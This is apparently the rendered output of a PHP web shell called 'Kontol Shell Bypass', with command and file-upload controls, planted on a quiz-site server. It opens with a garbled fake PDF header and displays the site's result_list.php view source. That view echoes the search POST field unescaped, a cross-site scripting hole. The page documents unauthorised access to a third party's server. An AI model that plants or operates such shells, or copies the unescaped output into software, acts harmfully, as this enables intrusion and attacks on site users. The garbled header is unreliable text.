%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/chalkbank.com/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/chalkbank.com/application/views/result_list.php
<?php 
$logged_in=$this->session->userdata('logged_in');
if($logged_in['su']>='1'){ 
?>
<div class="main-wapper-inner">
<div class="top-menus">
 <div class="container-fluid">
   <div class="row">
   <div class="col-lg-12">
		<h3><i class="fa fa-list fa-x"></i> <?php echo $this->lang->line('generate_report');?> </h3> 
   </div><!-- /input-group -->
	 
     </div>
  </div><!-- /.col-lg-6 -->
</div>
<div class="home-inners">
 <div class="container-fluid">
   <div class="row">
 	<div class="col-lg-12">
	<form method="post" action="<?php echo site_url('result/generate_report/');?>">
	<div class="form-search form-search-2">
	 
	<select name="quid" class="form-control">
	<option value="0"><?php echo $this->lang->line('select_quiz');?></option>
	<?php 
		foreach($quiz_list as $qk => $quiz){  ?> 
		<option value="<?php echo $quiz['quid'];?>"><?php echo $quiz['quiz_name'];?></option>
	<?php } ?>
	</select>
 	 
	<select name="gid" class="form-control">
		<option value="0"><?php echo $this->lang->line('select_group');?></option>
		<?php 
		foreach($group_list as $gk => $group){ if($group['gid']==$logged_in['gid'] && $logged_in['su']=='0') { ?>
		<option value="<?php echo $group['gid'];?>"><?php echo $group['group_name'];?></option>
		<?php } else if($logged_in['su']>'0') {
			?>
			<option value="<?php echo $group['gid'];?>"><?php echo $group['group_name'];?></option>
		<?php }
		}
		?>
	</select>
 
<input type="date" name="date1" class="form-control" value="" placeholder="<?php echo $this->lang->line('date_from');?>">
 
 <input type="date" name="date2" class="form-control" value="" placeholder="<?php echo $this->lang->line('date_to');?>">
 
 <button class="btn btn-default button2" type="submit"><?php echo $this->lang->line('generate_report');?></button>	
 
    </div><!-- /input-group -->
	 </form>
  </div><!-- /.col-lg-6 -->
</div><!-- /.row -->
</div><!-- /.row -->
</div>
</div>
<?php 
}
?>
<div class="main-wapper-inner main-wapper-inner">
<div class="top-menus">
 <div class="container-fluid">
   <div class="row">
   <div class="col-lg-12">
		<h3><i class="fa fa-list fa-x"></i> <?php echo $title;?></h3>   
    </div><!-- /input-group -->
	</div>
  </div><!-- /.col-lg-6 -->
</div>
<div class="home-inners">
<div class="container-fluid">
<?php 
$logged_in=$this->session->userdata('logged_in');
$assignedModule = assignModuleList($logged_in['role_id']);
if($this->session->userdata['logged_in']['su']>=1 || array_key_exists('qbank',$assignedModule)){ ?> 
  <div class="row">
  <div class="col-sm-8">
	<form method="post" action="<?php echo site_url('result/index/');?>">
		<div class="form-search"> 
		<select name="fquid" name="fquid" class="form-control">
		   <option value=""><?php echo $this->lang->line('select_quiz');?></option>
		<?php 
			foreach($quiz_list as $qk => $quiz){  ?> 
			<option value="<?php echo $quiz['quid'];?>" <?php if($quiz['quid']==$fquid) { echo 'selected'; } ?> ><?php echo $quiz['quiz_name'];?></option>
		<?php } ?>
		</select> 
		<button class="btn btn-default button2" type="submit"><?php echo $this->lang->line('filter');?></button>	
	  </div>
  </form>
  </div>
  <div class="col-sm-4">
  <div class="form-search">
	 <form method="post" action="<?php echo site_url('result/index/');?>">
		<input type="text" class="form-control" name="search" placeholder="<?php echo $this->lang->line('search');?>..." value="<?=$_POST['search']?>"> &nbsp;&nbsp;
		<button class="btn btn-default button2" type="submit"><?php echo $this->lang->line('search');?></button>	
	 </form>
  </div>
  </div>
</div><!-- /.row -->
<?php 
}
?>
<div class="row">
<div class="col-md-12">
<?php 
if($this->session->flashdata('message')){
	echo $this->session->flashdata('message');	
}
?>	
<?php 
/*if($logged_in['su']=='1'){
?>
		<!-- <div class='alert alert-danger'><?php echo $this->lang->line('pending_message_admin');?></div>	-->	
<?php 
}*/
?>
<div class="table-responsice">
<table class="table table-bordered">
<tr>
<?php if($logged_in['su']=='0'){ ?>
<th><?php echo $this->lang->line('result_id');?></th>
<?php } else { ?>
<th><?php echo $this->lang->line('s_no');?></th>
<?php } ?>
<th><?php echo $this->lang->line('full_first_name');?></th>
<th><?php echo $this->lang->line('quiz_name');?></th>
<th><?php echo $this->lang->line('status');?>
<?php 
if($this->session->userdata['logged_in']['su']>=1 || array_key_exists('qbank',$assignedModule)){
?>
 <select onChange="sort_result('<?php echo $limit;?>',this.value);">
 <option value="0"><?php echo $this->lang->line('all');?></option>
 <option value="<?php echo $this->lang->line('pass');?>" <?php if($status==$this->lang->line('pass')){ echo 'selected'; } ?> ><?php echo $this->lang->line('pass');?></option>
 <option value="<?php echo $this->lang->line('fail');?>" <?php if($status==$this->lang->line('fail')){ echo 'selected'; } ?> ><?php echo $this->lang->line('fail');?></option>
 <option value="<?php echo $this->lang->line('pending');?>" <?php if($status==$this->lang->line('pending')){ echo 'selected'; } ?> ><?php echo $this->lang->line('pending');?></option>
 </select>
<?php } ?>
 
 </th>
 <th><?php echo $this->lang->line('percentage_obtained');?></th>
 <?php 
if($this->session->userdata['logged_in']['su']>=1 || array_key_exists('qbank',$assignedModule)){
?>
 <th><?php echo $this->lang->line('date');?></th>
 <?php } ?>
<th><?php echo $this->lang->line('action');?> </th>
</tr>
<?php 
if(count($result)==0){
?>
<tr>
 <td colspan="6"><?php echo $this->lang->line('no_record_found');?></td>
</tr>	
	
	
<?php }

$k = count($result);
$i=1;
foreach($result as $key => $val){
?>
<tr>
<?php 
if($logged_in['su']=='1'){
	$cntr = $limit+$i;
?>
<td> <?php echo $cntr;?></td>
<?php } else { ?>
<td> <?php echo $this->lang->line('attempt_number');?><?php echo $k; ?></td>
<?php } ?>
<td><?php echo $val['first_name'];?> <?php echo $val['last_name'];?></td>
<td><?php echo $val['quiz_name'];?></td>
<td><?php if($val['show_result']=='1' || $logged_in['su']=='1') { echo $val['result_status']; } else { echo 'NA'; }?></td>

<td>
<?php 
$perc = round($val['percentage_obtained'],2);
$pass_percentage = $val['pass_percentage'];
$class = '';
	if($perc<$pass_percentage){
		$class = ' qbg-danger';
	} else if($perc>=$pass_percentage){		
		$class = ' qbg-success';
	}
?>
<div class="progress">
  <div class="progress-bar <?=$class?>" role="progressbar" style="width: <?php echo floatval($perc);?>%" aria-valuenow="<?php echo floatval($perc);?>" aria-valuemin="0" aria-valuemax="100"><span style="font-size:10px;"><?php echo floatval($perc);?>%</span></div>
</div>
</td>
<?php 
if($this->session->userdata['logged_in']['su']>=1 || array_key_exists('qbank',$assignedModule)){
?>

<td><?php echo date('d M, Y H:i:s',$val['end_time']);?></td>
<?php } ?>
<td>
<a href="<?php echo site_url('result/view_result/'.$val['rid']);?>" class="btn btn-success button4" ><?php echo $this->lang->line('view');?> </a>
<?php 
if($logged_in['su']>='1'){
?>
	<a href="javascript:remove_entry('result/remove_result/<?php echo $val['rid'];?>');"><img src="<?php echo base_url('images/cross.png');?>"></a>
<?php 
}
?>
</td>
</tr>

<?php $i++; $k--;
}
?>
</table>
</div>
</div>

</div>

<?php
if($limit>0) {
if(($limit-($this->config->item('number_of_rows')))>=0){ $back=$limit-($this->config->item('number_of_rows')); }else{ $back='0'; }
?>
<a href="<?php echo site_url('result/index/'.$back.'/'.$status.'/'.$fquid);?>"  class="btn btn-primary button3"><?php echo $this->lang->line('back');?></a>
<?php } ?>
&nbsp;&nbsp;
<?php
if(count($result)>=200) {
 $next=$limit+($this->config->item('number_of_rows'));  ?>
<a href="<?php echo site_url('result/index/'.$next.'/'.$status.'/'.$fquid);?>"  class="btn btn-primary button3"><?php echo $this->lang->line('next');?></a>
<?php } ?>
</div>
</div>
 </div>
 <script>
  $("#fquid").change(function() {
     this.form.submit();
});
 </script>

Kontol Shell Bypass